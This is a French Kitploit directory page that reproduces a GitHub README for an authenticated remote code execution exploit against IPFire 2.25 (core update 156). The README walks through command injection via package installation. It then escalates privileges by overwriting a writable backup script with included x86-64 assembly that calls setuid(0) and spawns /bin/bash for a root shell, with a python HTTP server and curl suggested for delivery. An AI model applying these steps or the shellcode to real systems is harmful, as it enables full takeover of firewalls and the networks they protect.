Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ipfire-2-25-auth-rce — ipfire 2.25 exécution de code à distance authentifiée | Kitploit
Outils/GitHubGitHub/kaanaryoverflow/ipfire-2-25-auth-rce
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebDéveloppement de Charges UtilesExploitation de Binaires
GitHubkaanaryoverflow/ipfire-2-25-auth-rce

ipfire-2-25-auth-rce

ipfire 2.25 exécution de code à distance authentifiée

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
22il y a 5 ansPas encore vérifié

Ipfire 2-25 (core update 156) RCE authentifié

  • le système exécute une commande lors de l'installation de n'importe quel paquet

packfileinstallation

  • le système récupère 7zip à partir d'un simple html

pocpc0

  • et vérifiez le répertoire tmp

pocpc1

  • version 2.25 - core update 156

version

  • ipfire permet d'exécuter des commandes système arbitraires en tant que nobody après connexion

Soyez root !

  • vérifiez les binaires suid

find-suid

  • le programme de sauvegarde exécute un autre script. /var/ipfire/backup/bin/backup.pl (c'est un script bash et les permissions semblent bonnes)

backup-tespiti

  • essayez d'écrire dans le script bash. (Aucune erreur. BON !)

yazma-denemesi

  • essayez de lancer bash

yazabilme-kanıtı

  • oui. nous pouvons l'exécuter mais les privilèges sont limités. nous devons déclencher setuid(0) !
  • enregistrez ceci et exécutez alti name.asm q
  • alti est mon propre programme de vérification de compilation dans le dépôt soo_deep.
root@kitploit:~
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00
  olmadil equ $-olmadis
section .text
  global main
main:
  mov rax,105
  mov rdi,0
  syscall
  cmp rax,0
  je getbash

  mov rax,1
  mov rdi,1
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60
  xor rdi,rdi
  syscall

getbash:
  mov rax,59
  mov rdi,string
  mov rsi,0
  mov rdx,0
  syscall
  • et écrivez le nouveau programme dans /var/ipfire/backup/bin/backup.pl. (nous pouvons utiliser un serveur http python et curl pour écrire)

  • et profitez du shell root !

image

Télécharger l’outil